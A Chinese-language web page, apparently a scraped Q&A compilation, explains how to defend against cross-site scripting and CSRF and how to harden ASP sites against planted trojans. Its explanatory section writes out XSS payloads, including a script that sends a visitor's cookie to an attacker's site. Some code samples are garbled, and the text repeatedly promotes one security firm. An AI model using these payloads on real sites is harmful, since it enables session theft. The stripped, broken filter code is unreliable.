防止跨站攻击_大网站有防跨站攻击吗

hacker|
157

如何防止跨站点脚本攻击

防止跨站点脚本攻击的解决方法:

1.输入过滤

对每一个用户的输入或者请求首部,都要进行过滤。这需要程序员有良好的安全素养,而且需要覆盖到所有的输入源。而且还不能够阻止其他的一些问题,如错误页等。

final String filterPattern="[{}\\[\\];\\]";

String inputStr = s.replaceAll(filterPattern," ");

2.输出过滤

public static String encode(String data)

{

final StringBuffer buf = new StringBuffer();

final char[] chars = data.toCharArray();

for (int i = 0; i chars.length; i++)

{

buf.append("" + (int) chars[i]);

}

return buf.toString();

}

public static String decodeHex(final String data,

final String charEncoding)

{

if (data == null)

{

return null;

}

byte[] inBytes = null;

try

{

inBytes = data.getBytes(charEncoding);

}

catch (UnsupportedEncodingException e)

{

//use default charset

inBytes = data.getBytes();

}

byte[] outBytes = new byte[inBytes.length];

int b1;

int b2;

int j=0;

for (int i = 0; i inBytes.length; i++)

{

if (inBytes[i] == '%')

{

b1 = Character.digit((char) inBytes[++i], 16);

b2 = Character.digit((char) inBytes[++i], 16);

outBytes[j++] = (byte) (((b1 0xf) 4) +

(b2 0xf));

}

else

{

outBytes[j++] = inBytes[i];

}

}

String encodedStr = null;

try

{

encodedStr = new String(outBytes, 0, j, charEncoding);

}

catch (UnsupportedEncodingException e)

{

encodedStr = new String(outBytes, 0, j);

}

return encodedStr;

}

!-- Maps the 404 Not Found response code

to the error page /errPage404 --

error-page

error-code404/error-code

location/errPage404/location

/error-page

!-- Maps any thrown ServletExceptions

to the error page /errPageServ --

error-page

exception-typejavax.servlet.ServletException/exception-type

location/errPageServ/location

/error-page

!-- Maps any other thrown exceptions

to a generic error page /errPageGeneric --

error-page

exception-typejava.lang.Throwable/exception-type

location/errPageGeneric/location

/error-page

任何的非servlet例外都被/errPageGeneric路径捕捉,这样就可以处理。

Throwable throwable = (Throwable)

request.getAttribute("javax.servlet.error.exception");

String status_code = ((Integer)

request.getAttribute("javax.servlet.error.status_code")).toString( );

3.安装三方的应用防火墙,可以拦截css攻击。

附:

跨站脚本不像其他攻击只包含两个部分:攻击者和web站点。

跨站脚本包含三个部分:攻击者,客户和web站点。

跨站脚本攻击的目的是窃取客户的cookies,或者其他可以证明用户身份的敏感信息。

攻击

一个get请求

GET /welcome.cgi?name=Joe%20Hacker HTTP/1.0

Host:

会产生如下的结果

HTML

TitleWelcome!/Title

Hi Joe Hacker

BR

Welcome to our system

...

/HTML

但是如果请求被篡改

GET /welcome.cgi?name=scriptalert(document.cookie)/script HTTP/1.0

Host:

就会得到如下的响应

HTML

TitleWelcome!/Title

Hi scriptalert(document.cookie)/script

BR

Welcome to our system

...

/HTML

这样在客户端会有一段非法的脚本执行,这不具有破坏作用,但是如下的脚本就很危险了。

;scriptwindow.open(“”%2Bdocument.cookie)/script

响应如下:

HTML

TitleWelcome!/Title

Hi

scriptwindow.open(“”+document.cookie)/script

BR

Welcome to our system

...

/HTML

浏览器回执行该脚本并将客户的cookie发到一个攻击者的网站,这样攻击者就得到了客户的cookie。

asp网站如何阻止被跨站攻击

把客户提交的数据,在服务器端检索。。。这些能防御一般的注入

如果服务器文件经常被挂马,登陆虚拟主机,把图片文件夹的脚本执行的权限取消了。大多挂马都是从上传文件处下手的。

如果是SQL数据库常被注入,需要把服务器几个高级别的权限取消,就可以彻底的抵御攻击。

程序要安全。。。

防止跨站攻击——CSRFToken

CSRF:无法获取受害者的cookie,无法看到cookie;

只是利用受害者是被服务器信任的(靠验证cookie),而给服务器发送请求;

怎么防止跨站攻击:

表单:在 Form 表单中添加一个隐藏的的字段,值是 csrf_token。

非表单:在ajax获取数据时,添加headers:{ 'X-CSRFToken':getCookie('csrf_token') }。

原理:在浏览器访问网站A时,网站A设置cookie会增加随机值csrf_token,这个值是随机的。返回给浏览器时,cookie会储存在浏览器,同时会把csrf_token传给表单里面的隐藏字段。所以当浏览器用自己的表单时会自带csrf_token,网站A取到这个值和cookie里的csrf_token一致就通过。而网站B里面的表单没有这个值,所以不能通过,这样就阻止了恶意攻击。非表单也是这样的原理。

vps上面放多个网站,如何设置目录安全可以防止跨站入侵?

关于目录权限的安全分配牵扯到服务器安全。

服务器安全这问题,很重要,之前服务器被黑,管理员账号也被篡改,远程端口也登陆不了了。,在网上搜索了一些服务器安全设置以及防黑的文章,对着文章,我一个一个的设置起来,费了好几天的时间才设置完,原以为会防止服务器再次被黑,没想到服务器竟然瘫痪了,网站都打不开了,无奈对服务器安全也是一窍不通,损失真的很大,数据库都损坏了,我哪个后悔啊。娘个咪的。最后还是让机房把系统重装了。找了几个做网站服务器方面的朋友,咨询了关于服务器被黑的解决办法,他们建议找国内最有名的服务器安全的安全公司来给做安全维护,推荐了sinesafe,服务器被黑的问题,才得以解决。

一路的走来,才知道,服务器安全问题可不能小看了。经历了才知道,服务器安全了给自己带来的也是长远的利益。 希望我的经历能帮到楼主,帮助别人也是在帮助我自己。

下面是一些关于安全方面的建议!

建站一段时间后总能听得到什么什么网站被挂马,什么网站被黑。好像入侵挂马似乎是件很简单的事情。其实,入侵不简单,简单的是你的网站的必要安全措施并未做好。

一:挂马预防措施:

1、建议用户通过ftp来上传、维护网页,尽量不安装asp的上传程序。

2、定期对网站进行安全的检测,具体可以利用网上一些工具,如sinesafe网站挂马检测工具!

序,只要可以上传文件的asp都要进行身份认证!

3、asp程序管理员的用户名和密码要有一定复杂性,不能过于简单,还要注意定期更换。

4、到正规网站下载asp程序,下载后要对其数据库名称和存放路径进行修改,数据库文件名称也要有一定复杂性。

5、要尽量保持程序是最新版本。

6、不要在网页上加注后台管理程序登陆页面的链接。

7、为防止程序有未知漏洞,可以在维护后删除后台管理程序的登陆页面,下次维护时再通过ftp上传即可。

8、要时常备份数据库等重要文件。

9、日常要多维护,并注意空间中是否有来历不明的asp文件。记住:一分汗水,换一分安全!

10、一旦发现被入侵,除非自己能识别出所有木马文件,否则要删除所有文件。

11、对asp上传程序的调用一定要进行身份认证,并只允许信任的人使用上传程序。这其中包括各种新闻发布、商城及论坛程

二:挂马恢复措施:

1.修改帐号密码

不管是商业或不是,初始密码多半都是admin。因此你接到网站程序第一件事情就是“修改帐号密码”。帐号

密码就不要在使用以前你习惯的,换点特别的。尽量将字母数字及符号一起。此外密码最好超过15位。尚若你使用

SQL的话应该使用特别点的帐号密码,不要在使用什么什么admin之类,否则很容易被入侵。

2.创建一个robots.txt

Robots能够有效的防范利用搜索引擎窃取信息的骇客。

3.修改后台文件

第一步:修改后台里的验证文件的名称。

第二步:修改conn.asp,防止非法下载,也可对数据库加密后在修改conn.asp。

第三步:修改ACESS数据库名称,越复杂越好,可以的话将数据所在目录的换一下。

4.限制登陆后台IP

此方法是最有效的,每位虚拟主机用户应该都有个功能。你的IP不固定的话就麻烦点每次改一下咯,安全第一嘛。

5.自定义404页面及自定义传送ASP错误信息

404能够让骇客批量查找你的后台一些重要文件及检查网页是否存在注入漏洞。

ASP错误嘛,可能会向不明来意者传送对方想要的信息。

6.慎重选择网站程序

注意一下网站程序是否本身存在漏洞,好坏你我心里该有把秤。

7.谨慎上传漏洞

据悉,上传漏洞往往是最简单也是最严重的,能够让黑客或骇客们轻松控制你的网站。

可以禁止上传或着限制上传的文件类型。不懂的话可以找专业做网站安全的sinesafe公司。

8. cookie 保护

登陆时尽量不要去访问其他站点,以防止 cookie 泄密。切记退出时要点退出在关闭所有浏览器。

9.目录权限

请管理员设置好一些重要的目录权限,防止非正常的访问。如不要给上传目录执行脚本权限及不要给非上传目录给于写入权。

10.自我测试

如今在网上黑客工具一箩筐,不防找一些来测试下你的网站是否OK。

11.例行维护

a.定期备份数据。最好每日备份一次,下载了备份文件后应该及时删除主机上的备份文件。

b.定期更改数据库的名字及管理员帐密。

c.借WEB或FTP管理,查看所有目录体积,最后修改时间以及文件数,检查是文件是否有异常,以及查看是否有异常的账号。

0条大神的评论

发表评论